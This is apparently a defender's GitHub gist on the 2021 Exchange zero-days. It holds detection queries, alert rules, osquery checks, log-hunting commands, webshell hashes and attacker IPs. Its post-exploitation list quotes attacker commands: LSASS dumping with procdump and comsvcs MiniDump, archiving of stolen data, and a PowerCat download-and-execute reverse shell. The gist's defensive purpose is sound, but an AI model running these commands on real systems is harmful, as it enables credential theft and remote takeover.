Skip to content

Instantly share code, notes, and snippets.

@zaneGittins

zaneGittins/Exchange0days.md

Created March 10, 2021 19:47
Show Gist options
  • Save zaneGittins/f55305f53ba9464f883b3701bf6b505f to your computer and use it in GitHub Desktop.
Save zaneGittins/f55305f53ba9464f883b3701bf6b505f to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Exchange0days.md

Exchange 0days

Resources

Post Exploitation Activity

  1. Covenant
  2. Using Procdump to dump LSASS process memory:
c:\windows\temp\procdump64 -accepteula -ma lsass.exe C:\windows\temp\lsass
  1. Minidump to dump LSASS memory:
rundll32 C:\windows\system32\comsvcs.dll MiniDump lsass.dmp
  1. Zip to compress stolen data
C:\ProgramData\7z a -t7z -r C:\ProgramData\it.zip C:\ProgramData\pst
  1. Adding Exchange PowerShell snap-ins
Add-PSSnapin Microsoft.Exchange.Management.PowerSHell.Snapin; Get-mailbox
Add-PSSnapin Microsoft.Exchange.Management.PowerSHell.Snapin; Get-MailboxExportRequest -ResultSize 100
Add-PSSnapin Microsoft.Exchange.Management.PowerSHell.Snapin; Remove-MailboxExportRequest -Confirm:$false
  1. Nishang Invoke-PowerShellTcpOneLineBind
  2. PowerCat
IEX (New-Object System.Net.Webclient).DownloadString (powercat); powercat -c <> -p <> -e powershell

Data Lake Queries / Correlation Rules

(event_id: 4688 OR event_id: 1) AND process_name: ("powershell.exe" OR "PowerShell_ISE.exe") AND command_line: "*$client = New-Object System.Net.Sockets.TCPClient*"

(event_id: 4688 OR event_id: 1) AND process_name: ("powershell.exe" OR "PowerShell_ISE.exe") AND command_line: "*powercat*"

(event_id: 4688 OR event_id: 1) AND process_name: ("powershell.exe" OR "PowerShell_ISE.exe") AND command_line: "*Add-PSSnapin Microsoft.Exchange.Powershell.Snapin*"

(event_id: 4688 OR event_id: 1) AND process_name: "rundll32.exe" AND command_line: "*MiniDump*"

event_data.OriginalFileName:("psexec.c" OR "procdump" OR "procexp.exe")

parent_process_name: ('w3wp.exe' OR 'httpd.exe' OR 'nginx.exe' OR 'php-cgi.exe' OR 'tomcat.exe') AND process_name:('cmd.exe' OR 'sh.exe' OR 'bash.exe' OR 'powershell.exe' OR 'bitsadmin.exe')

AA Rules

Detect powershell executed with specific commandline parameters:

customer-created-CsqjLzIVDD {
  RuleName = "HAFNIUM activity"
  RuleDescription = "HAFNIUM activity"
  ReasonTemplate = "HAFNIUM activity"
  AggregateReasonTemplate = "HAFNIUM activity"
  RuleType = "endpoint"
  RuleCategory = "Endpoint Activity"
  ClassifyIf = "true"
  RuleEventTypes = ["process-created"]
  Disabled = "false"
  Model = "FACT"
  FactFeatureName = "process_name"
  Score = "50"
  PercentileThreshold = "0.1"
  RuleExpression = """inList(toLower(process_name),'powershell.exe','powershell_ise.exe') && (contains(command_line,'$client = New-Object System.Net.Sockets.TCPClient') || contains(command_line,'powercat') || contains(command_line,'Add-PSSnapin Microsoft.Exchange.Powershell.Snapin'))"""
  DependencyExpression = "NA"
}

Detect a process reading lsass memory (requires Sysmon).

customer-created-UgVP7zNhx6 {
  RuleName = "LSASS process read access."
  RuleDescription = "LSASS process read access."
  ReasonTemplate = "LSASS process read access."
  AggregateReasonTemplate = "LSASS process read access."
  RuleType = "asset"
  RuleCategory = "Endpoint Activity"
  ClassifyIf = "true"
  RuleEventTypes = ["process-created",
    "process-alert"]
  Disabled = "FALSE"
  Model = "FACT"
  FactFeatureName = "process_name"
  Score = "50.0"
  PercentileThreshold = "0.1"
  RuleExpression = "inList(outcome,'0x1010','0x1fffff') && target_process_name = 'lsass.exe'"
  DependencyExpression = "NA"
}

Detect potential webshell activity (based on Sigma rule):

customer-created-R66RGlFeBd {
  RuleName = "Possible windows webshell activity"
  RuleDescription = "Possible windows webshell activity"
  ReasonTemplate = "Possible windows webshell activity"
  AggregateReasonTemplate = "Possible windows webshell activity"
  RuleType = "endpoint"
  RuleCategory = "Endpoint Activity"
  ClassifyIf = "true"
  RuleEventTypes = ["process-created"]
  Disabled = "false"
  Model = "FACT"
  FactFeatureName = "process_name"
  Score = "25"
  PercentileThreshold = "0.1"
  RuleExpression = "inList(toLower(parent_process_name), 'w3wp.exe', 'httpd.exe', 'nginx.exe', 'php-cgi.exe', 'tomcat.exe') && inList(toLower(process_name),'cmd.exe', 'sh.exe', 'bash.exe', 'powershell.exe', 'bitsadmin.exe')"
  DependencyExpression = "NA"
}

OsQuery

Detect Nishang listener:

SELECT listening_ports.port, processes.name FROM listening_ports join processes on listening_ports.pid = processes.pid where LOWER(name) LIKE "%powershell%"

Detect procdump registry key:

SELECT datetime(mtime, 'unixepoch', 'localtime') AS EULA_accepted,path 

FROM registry 

WHERE path LIKE 'HKEY_USERS\%\Software\Sysinternals\ProcDump\EulaAccepted';

PowerShell

From the Microsoft blog:

CVE-2021-26855

Import-Csv -Path (Get-ChildItem -Recurse -Path "$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\HttpProxy" -Filter '*.log').FullName | Where-Object {  $_.AuthenticatedUser -eq '' -and $_.AnchorMailbox -like 'ServerInfo~*/*' } | select DateTime, AnchorMailbox

CVE-2021-26858

findstr /snip /c:"Download failed and temporary file" "%PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\OABGeneratorLog\*.log"

CVE-2021-26857

Get-EventLog -LogName Application -Source "MSExchange Unified Messaging" -EntryType Error | Where-Object { $_.Message -like "*System.InvalidCastException*" }

CVE-2021-27065

Select-String -Path "$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\ECP\Server\*.log" -Pattern 'Set-.+VirtualDirectory'

Webshell Hashes

b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0
097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e
2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1
65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5
511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1
4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea
811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d
1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944

IIS/WAF logs

Based on Sigma rule.

# Search for post requests with specific user agents.
method:"POST" AND userAgent: ("DuckDuckBot/1.0;+(+http://duckduckgo.com/duckduckbot.html)" OR "facebookexternalhit/1.1+(+http://www.facebook.com/externalhit_uatext.php)" OR "Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)" OR "Mozilla/5.0+(compatible;+Bingbot/2.0;++http://www.bing.com/bingbot.htm)" OR "Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html" OR "Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails)" OR "Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp)" OR "Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots)" OR "Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36")

method:"POST" AND userAgent:("ExchangeServicesClient/0.0.0.0" OR "Googlebot/2.1+(+http://www.googlebot.com/bot.html)" OR "Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)")

# Search for POSTS to specific paths

method:"POST" AND uri_path:("*/owa/auth/Current/*" OR "*/ecp/default.flt" OR "*/ecp/main.css" OR "*.js*")

IPs

103.77.192.219
104.140.114.110
104.250.191.110
108.61.246.56
149.28.14.163
157.230.221.198
167.99.168.251
185.250.151.72
192.81.208.169
203.160.69.66
211.56.98.146
5.254.43.18
80.92.205.81
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment